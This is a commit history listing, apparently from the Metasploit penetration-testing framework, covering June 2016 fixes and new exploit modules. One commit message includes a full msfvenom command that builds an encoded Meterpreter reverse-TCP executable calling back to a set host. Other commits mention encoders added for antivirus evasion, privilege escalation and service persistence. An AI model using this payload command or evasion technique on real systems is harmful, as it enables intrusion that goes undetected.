Commit Graph

21851 Commits

Author SHA1 Message Date
Pearce Barry 159446ce92 Ensure http_login scanner module saves passwds.
Fixes #6983.  When the auxiliary/scanner/http/http_login module discovers a successful basic auth user+password combination, make sure we properly store the password by specifically telling the credentials gem that the private data we're storing is a :password.
2016-06-30 16:58:39 -05:00
William Webb 1401a61f59 Land #6998, Fix #6984 Undefined method 'winver' in ms10_092_schelevator 2016-06-30 16:14:09 -05:00
agix 3edb0b3625 Reduce chance to get a null byte in the decoder stub 2016-06-30 19:14:32 +02:00
agix 31ea58d7f0 Inherit from Msf::Encoder::Xor to get key preventing badchars
I guess it's what Msf::Encoder::Xor find_bad_keys is for.
2016-06-30 18:29:30 +02:00
wchen-r7 1ecef265a1 Do a fail_with in case nonce is not found at all 2016-06-30 11:21:45 -05:00
wchen-r7 e2b9225907 Fix #7022, Failing to find wpnonce in fetch_ninja_form_nonce
This patch fixes a problem when the module is used against an older
version of ninja forms (such as 2.9.27), the nonce is found in a
hidden input instead of the JavaScript code, which actually causes
an undefined method 'gsub' bug in the module.

Fix #7022
2016-06-30 11:15:38 -05:00
Tod Beardsley afbeb2b668 Land #7023, fixes for swagger exploit
Thanks @sdavis-r7!

See #7015 as well.
2016-06-30 10:54:34 -04:00
Tod Beardsley d1281b6594 Chmod to remove the exec bit. 2016-06-30 10:43:46 -04:00
Francesco 068a4007de Riverbed SteelCentral NetProfiler & NetExpress Exploit Module
Changes to be committed:
    new file:   modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
2016-06-29 22:27:40 -04:00
agix 8a777bec41 Forget to rename function after msftidy correction 2016-06-29 23:30:48 +02:00
agix c489c5ce3e Add two x64 encoders to improve anti-virus evasion 2016-06-29 23:11:24 +02:00
agix 88bdee4d4b Pass service name in env to the encoders 2016-06-29 23:07:35 +02:00
William Vu 68bd4e2375 Fire and forget the shell
Edge case where reverse_perl returns 302 when app is unconfigured.
2016-06-29 14:51:05 -05:00
forzoni d414ea59c3 Remove bash dependency. Oops. 2016-06-28 22:39:45 -05:00
David Maloney 3d93c55174 move sshfactory into a mixin method
use a convenience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention

MS-1688
2016-06-28 15:23:12 -05:00
James Lee 4e63591ce8 Use the proper Author key, not Authors 2016-06-28 15:21:19 -05:00
David Maloney ee2d1d4fdc Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-06-28 15:00:35 -05:00
David Maloney 97f9ca4028 Merge branch 'master' into egypt/ruby-ntlm 2016-06-28 14:14:56 -05:00
Louis Sato d5d0b9e9b8 Revert "Land #6729, Speed up the datastore"
This reverts commit c6b1955a5a, reversing
changes made to 4fb7472391.
2016-06-28 13:39:52 -05:00
forzoni 5f044ffda0 s/print_warning/print_error. 2016-06-28 10:26:23 -05:00
forzoni 0635fee820 Move some log lines to vprint_status. 2016-06-28 03:28:41 -05:00
forzoni 6c11692b04 Add privilege escalation for host users that can access the docker daemon. 2016-06-28 03:24:41 -05:00
RageLtMan fcf8cda22f Add basic module for CVE-2016-2098
ActionPack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2
implement unsafe dynamic rendering of inline content such that
passing ERB wrapped Ruby code leads to remote execution.

This module only implements the Ruby payloads, but can easily
be extended to use system calls to execute native/alternate
payload types as well.

Test Procedures:
  Clone https://github.com/hderms/dh-CVE_2016_2098
  Run bundle install to match gem versions to those in lockfile
  Run the rails server and configure the metasploit module:
    Set TARGETURI to /exploits
    Configure payload and handler options
  Execute the module, move on to post-exp
2016-06-28 03:28:16 -04:00
William Vu 5f08591fef Add Nagios XI exploit 2016-06-27 15:17:18 -05:00
Scott Lee Davis 2480781409 pesky pry. 2016-06-27 01:55:49 -04:00
Scott Lee Davis c2b4e22b46 updated with discovered changes from k kali & documentation update changes requested. 2016-06-27 01:53:20 -04:00
h00die 1c20122648 fedora compatibility, added naming options 2016-06-25 08:43:55 -04:00
James Lee 058115c21f Land #7015, sdavis' swagger exploit 2016-06-24 16:13:51 -05:00
James Lee 15a1a9ed71 Raise if payload.arch doesn't match expected
This is necessary when payload is a generic/* since we can't actually
figure out what we need the prefix/suffix to be because the generics are
a pain to extract the arch/platform info out of.

Also remove some unnecessary options.
2016-06-24 16:08:47 -05:00
David Maloney 409e26351b remove test module
sponge left in patient
2016-06-24 15:12:47 -05:00
David Maloney 6c3871bd0c update ssh modules to use new SSHFactory
updated all of our SSH based modules to use the
new SSHFactory class to plug Rex::Sockets into
Net::SSH

MS-1688
2016-06-24 13:55:28 -05:00
David Maloney 5bc513d6cd get ssh sessions working properly
ssh sessions now working correctly

MD-1688
2016-06-24 12:14:48 -05:00
wchen-r7 9f280d714e Land #6994, NetBIOS Name Brute Force Spoofing modules 2016-06-23 17:54:51 -05:00
Scott Davis 3fb9eae687 EOL space if a ruby devil. 2016-06-23 15:40:16 -07:00
Scott Davis b38b116c9a @ePaul comments added to description. 2016-06-23 15:33:11 -07:00
Tod Beardsley 08d08d2c95 Fix Java payload generator 2016-06-23 14:51:26 -05:00
Tod Beardsley 464808d825 First, put the RC data in the module proper 2016-06-23 14:43:37 -05:00
Tod Beardsley 92c70dab6f Real array, and fix PHP 2016-06-23 13:22:21 -05:00
Tod Beardsley ffabf26593 No Automatic target. 2016-06-23 12:50:23 -05:00
Tod Beardsley 7a36d03fe3 Trying multi arch 2016-06-23 12:34:51 -05:00
Scott Lee Davis 47674c77ad chmod 644 swagger_param_inject.rb 2016-06-23 11:49:16 -04:00
Scott Lee Davis fbd0bc4308 updated as per @egypt & @todb-r7 recommendations. 2016-06-23 11:41:54 -04:00
khr0x40sh 40d7de05ef Fix Payload Generation
Payload generation now only occurs once and function 'setup_pay'
removed.  Payload is generated with cmd_psh_payload and is mutated to
fit dropped text file.
2016-06-23 11:20:22 -04:00
Tod Beardsley fc79f3a2a9 Modify for only NodeJS
Not sure if we can do multiple arch's in the same module. Doesn't look
like it's possible today.

See rapid7#7015
2016-06-23 10:14:57 -05:00
Scott Davis 579a3bcf7c default payload is NOT text based, so do nothing with it. 2016-06-23 07:00:14 -07:00
agix 9bb5577320 Forget to push the fix for msftidy... 2016-06-23 15:23:40 +02:00
Scott Davis 47e4321424 CVE-2016-5641 2016-06-23 06:09:37 -07:00
agix 378208bc3d Move service stub in x86 encoder to be easily used.
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoders to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoders (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoders to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
2016-06-23 14:56:03 +02:00
h00die 18a3bf5f62 service persistence 2016-06-22 19:22:18 -04:00
wchen-r7 048741660c Land #6980, Add ClamAV Remote Command Transmitter 2016-06-22 15:50:45 -05:00